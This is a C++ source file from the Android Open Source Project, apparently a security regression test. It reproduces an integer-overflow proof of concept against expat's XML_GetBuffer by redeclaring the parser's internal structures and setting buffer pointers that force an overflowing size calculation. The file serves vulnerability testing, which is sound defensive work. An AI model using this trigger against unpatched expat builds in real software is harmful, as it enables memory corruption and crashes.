/*
 * Copyright (C) 2024 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

#include <unistd.h>

#include <vector>

#include "common.h"
#include "expat.h"
#include "expat_config.h"
#include "expat_external.h"
#include "internal.h"
#include "xmlrole.h"

constexpr long kMaxEntries = 1024 * 1024;

// Defining 'kBufferSize' such that 'kBufferPtrOffset' is greater than XML_CONTENT_BYTES, but still
// within a valid memory region. Defining end offset to be after the pointer offset.
constexpr size_t kBufferSize = XML_CONTEXT_BYTES + 2;
constexpr size_t kBufferPtrOffset = kBufferSize - 1;
constexpr size_t kBufferEndOffset = kBufferPtrOffset + 1;

// Setting 'kBufferLength' such that value of 'neededSize' defined in external/expat/lib/xmlparse.c
// is INT_MAX so that an integer overflow check on 'neededSize' is avoided so that control reaches
// the line 'neededSize += keep;'.
constexpr size_t kBufferLength = INT_MAX - (kBufferEndOffset - kBufferPtrOffset);

// The following structure definitions are taking reference from the definitions with the same name
// declared in the file external/expat/lib/xmlparse.c
// The test explicitly declares these structures because their definitions are a part of the
// vulnerable file and hence can't be included in the PoC directly.

typedef enum XML_Error PTRCALL Processor(XML_Parser parser, const char *start, const char *end,
                                         const char **endPtr);

typedef struct binding {
    struct prefix *prefix;
    struct binding *nextTagBinding;
    struct binding *prevPrefixBinding;
    const struct attribute_id *attId;
    XML_Char *uri;
    int uriLen;
    int uriAlloc;
} BINDING;

typedef struct prefix {
    const XML_Char *name;
    BINDING *binding;
} PREFIX;

typedef struct {
    const XML_Char *name;
    const XML_Char *textPtr;
    int textLen;   /* length in XML_Chars */
    int processed; /* # of processed bytes - when suspended */
    const XML_Char *systemId;
    const XML_Char *base;
    const XML_Char *publicId;
    const XML_Char *notation;
    XML_Bool open;
    XML_Bool is_param;
    XML_Bool is_internal; /* true if declared in internal subset outside PE */
} ENTITY;

typedef struct open_internal_entity {
    const char *internalEventPtr;
    const char *internalEventEndPtr;
    struct open_internal_entity *next;
    ENTITY *entity;
    int startTagLevel;
    XML_Bool betweenDecl; /* WFC: PE Between Declarations */
} OPEN_INTERNAL_ENTITY;

typedef struct attribute_id {
    XML_Char *name;
    PREFIX *prefix;
    XML_Bool maybeTokenized;
    XML_Bool xmlns;
} ATTRIBUTE_ID;

typedef struct {
    const ATTRIBUTE_ID *id;
    XML_Bool isCdata;
    const XML_Char *value;
} DEFAULT_ATTRIBUTE;

typedef struct {
    const XML_Char *name;
    PREFIX *prefix;
    const ATTRIBUTE_ID *idAtt;
    int nDefaultAtts;
    int allocDefaultAtts;
    DEFAULT_ATTRIBUTE *defaultAtts;
} ELEMENT_TYPE;

typedef struct {
    enum XML_Content_Type type;
    enum XML_Content_Quant quant;
    const XML_Char *name;
    int firstchild;
    int lastchild;
    int childcnt;
    int nextsib;
} CONTENT_SCAFFOLD;

typedef struct block {
    struct block *next;
    int size;
    XML_Char s[1];
} BLOCK;

typedef struct {
    BLOCK *blocks;
    BLOCK *freeBlocks;
    const XML_Char *end;
    XML_Char *ptr;
    XML_Char *start;
    const XML_Memory_Handling_Suite *mem;
} STRING_POOL;

typedef const XML_Char *KEY;

typedef struct {
    KEY name;
} NAMED;

typedef struct {
    NAMED **v;
    unsigned char power;
    size_t size;
    size_t used;
    const XML_Memory_Handling_Suite *mem;
} HASH_TABLE;

typedef struct {
    HASH_TABLE generalEntities;
    HASH_TABLE elementTypes;
    HASH_TABLE attributeIds;
    HASH_TABLE prefixes;
    STRING_POOL pool;
    STRING_POOL entityValuePool;
    /* false once a parameter entity reference has been skipped */
    XML_Bool keepProcessing;
    /* true once an internal or external PE reference has been encountered;
       this includes the reference to an external subset */
    XML_Bool hasParamEntityRefs;
    XML_Bool standalone;
#ifdef XML_DTD
    /* indicates if external PE has been read */
    XML_Bool paramEntityRead;
    HASH_TABLE paramEntities;
#endif /* XML_DTD */
    PREFIX defaultPrefix;
    /* === scaffolding for building content model === */
    XML_Bool in_eldecl;
    CONTENT_SCAFFOLD *scaffold;
    unsigned contentStringLen;
    unsigned scaffSize;
    unsigned scaffCount;
    int scaffLevel;
    int *scaffIndex;
} DTD;

typedef struct {
    const XML_Char *str;
    const XML_Char *localPart;
    const XML_Char *prefix;
    int strLen;
    int uriLen;
    int prefixLen;
} TAG_NAME;

typedef struct tag {
    struct tag *parent;  /* parent of this element */
    const char *rawName; /* tagName in the original encoding */
    int rawNameLength;
    TAG_NAME name; /* tagName in the API encoding */
    char *buf;     /* buffer for name components */
    char *bufEnd;  /* end of the buffer */
    BINDING *bindings;
} TAG;

typedef struct {
    unsigned long version;
    unsigned long hash;
    const XML_Char *uriName;
} NS_ATT;

#ifdef XML_DTD
typedef unsigned long long XmlBigCount;
typedef struct accounting {
    XmlBigCount countBytesDirect;
    XmlBigCount countBytesIndirect;
    int debugLevel;
    float maximumAmplificationFactor; // >=1.0
    unsigned long long activationThresholdBytes;
} ACCOUNTING;

typedef struct entity_stats {
    unsigned int countEverOpened;
    unsigned int currentDepth;
    unsigned int maximumDepthSeen;
    int debugLevel;
} ENTITY_STATS;
#endif

struct XML_ParserStruct {
    /* The first member must be m_userData so that the XML_GetUserData
        macro works. */
    void *m_userData;
    void *m_handlerArg;
    char *m_buffer;
    const XML_Memory_Handling_Suite m_mem;
    /* first character to be parsed */
    const char *m_bufferPtr;
    /* past last character to be parsed */
    char *m_bufferEnd;
    /* allocated end of m_buffer */
    const char *m_bufferLim;
    XML_Index m_parseEndByteIndex;
    const char *m_parseEndPtr;
    XML_Char *m_dataBuf;
    XML_Char *m_dataBufEnd;
    XML_StartElementHandler m_startElementHandler;
    XML_EndElementHandler m_endElementHandler;
    XML_CharacterDataHandler m_characterDataHandler;
    XML_ProcessingInstructionHandler m_processingInstructionHandler;
    XML_CommentHandler m_commentHandler;
    XML_StartCdataSectionHandler m_startCdataSectionHandler;
    XML_EndCdataSectionHandler m_endCdataSectionHandler;
    XML_DefaultHandler m_defaultHandler;
    XML_StartDoctypeDeclHandler m_startDoctypeDeclHandler;
    XML_EndDoctypeDeclHandler m_endDoctypeDeclHandler;
    XML_UnparsedEntityDeclHandler m_unparsedEntityDeclHandler;
    XML_NotationDeclHandler m_notationDeclHandler;
    XML_StartNamespaceDeclHandler m_startNamespaceDeclHandler;
    XML_EndNamespaceDeclHandler m_endNamespaceDeclHandler;
    XML_NotStandaloneHandler m_notStandaloneHandler;
    XML_ExternalEntityRefHandler m_externalEntityRefHandler;
    XML_Parser m_externalEntityRefHandlerArg;
    XML_SkippedEntityHandler m_skippedEntityHandler;
    XML_UnknownEncodingHandler m_unknownEncodingHandler;
    XML_ElementDeclHandler m_elementDeclHandler;
    XML_AttlistDeclHandler m_attlistDeclHandler;
    XML_EntityDeclHandler m_entityDeclHandler;
    XML_XmlDeclHandler m_xmlDeclHandler;
    const ENCODING *m_encoding;
    INIT_ENCODING m_initEncoding;
    const ENCODING *m_internalEncoding;
    const XML_Char *m_protocolEncodingName;
    XML_Bool m_ns;
    XML_Bool m_ns_triplets;
    void *m_unknownEncodingMem;
    void *m_unknownEncodingData;
    void *m_unknownEncodingHandlerData;
    void(XMLCALL *m_unknownEncodingRelease)(void *);
    PROLOG_STATE m_prologState;
    Processor *m_processor;
    enum XML_Error m_errorCode;
    const char *m_eventPtr;
    const char *m_eventEndPtr;
    const char *m_positionPtr;
    OPEN_INTERNAL_ENTITY *m_openInternalEntities;
    OPEN_INTERNAL_ENTITY *m_freeInternalEntities;
    XML_Bool m_defaultExpandInternalEntities;
    int m_tagLevel;
    ENTITY *m_declEntity;
    const XML_Char *m_doctypeName;
    const XML_Char *m_doctypeSysid;
    const XML_Char *m_doctypePubid;
    const XML_Char *m_declAttributeType;
    const XML_Char *m_declNotationName;
    const XML_Char *m_declNotationPublicId;
    ELEMENT_TYPE *m_declElementType;
    ATTRIBUTE_ID *m_declAttributeId;
    XML_Bool m_declAttributeIsCdata;
    XML_Bool m_declAttributeIsId;
    DTD *m_dtd;
    const XML_Char *m_curBase;
    TAG *m_tagStack;
    TAG *m_freeTagList;
    BINDING *m_inheritedBindings;
    BINDING *m_freeBindingList;
    int m_attsSize;
    int m_nSpecifiedAtts;
    int m_idAttIndex;
    ATTRIBUTE *m_atts;
    NS_ATT *m_nsAtts;
    unsigned long m_nsAttsVersion;
    unsigned char m_nsAttsPower;
#ifdef XML_ATTR_INFO
    XML_AttrInfo *m_attInfo;
#endif
    POSITION m_position;
    STRING_POOL m_tempPool;
    STRING_POOL m_temp2Pool;
    char *m_groupConnector;
    unsigned int m_groupSize;
    XML_Char m_namespaceSeparator;
    XML_Parser m_parentParser;
    XML_ParsingStatus m_parsingStatus;
#ifdef XML_DTD
    XML_Bool m_isParamEntity;
    XML_Bool m_useForeignDTD;
    enum XML_ParamEntityParsing m_paramEntityParsing;
#endif
    unsigned long m_hash_secret_salt;
#ifdef XML_DTD
    ACCOUNTING m_accounting;
    ENTITY_STATS m_entity_stats;
#endif
};

XML_Parser parser;

struct mem_struct_t {
    void *mem_ptr;
    size_t mem_size;
};

mem_struct_t xml_malloc_list[kMaxEntries];
static int xml_malloc_list_size = 0;

void *xml_malloc(size_t size) {
    void *ptr = malloc(size);
    if (xml_malloc_list_size < kMaxEntries) {
        xml_malloc_list[xml_malloc_list_size].mem_ptr = ptr;
        xml_malloc_list[xml_malloc_list_size].mem_size = size;
        ++xml_malloc_list_size;
    }
    return ptr;
}

bool match_allocation_size(void *target_ptr, int target_size) {
    for (int i = 0; i < xml_malloc_list_size; ++i) {
        if (target_ptr == xml_malloc_list[i].mem_ptr &&
            target_size == xml_malloc_list[i].mem_size) {
            return true;
        }
    }
    return false;
}

int main() {
    XML_Memory_Handling_Suite memsuite = {};
    memsuite.malloc_fcn = xml_malloc;
    memsuite.realloc_fcn = realloc;
    memsuite.free_fcn = free;
    parser = XML_ParserCreate_MM(nullptr, &memsuite, nullptr);
    FAIL_CHECK(parser);

    bool match_found = match_allocation_size(parser, sizeof(struct XML_ParserStruct));
    FAIL_CHECK(match_found);

    std::vector<char> m_buffervector(kBufferSize);
    parser->m_buffer = m_buffervector.data();
    FAIL_CHECK(parser->m_buffer);

    parser->m_bufferPtr = parser->m_buffer + kBufferPtrOffset;
    parser->m_bufferEnd = parser->m_buffer + kBufferEndOffset;
    parser->m_bufferLim = parser->m_bufferEnd + 1;

    XML_GetBuffer(parser, kBufferLength);

    if (parser) {
        free(parser);
        parser = nullptr;
    }
    return EXIT_SUCCESS;
}
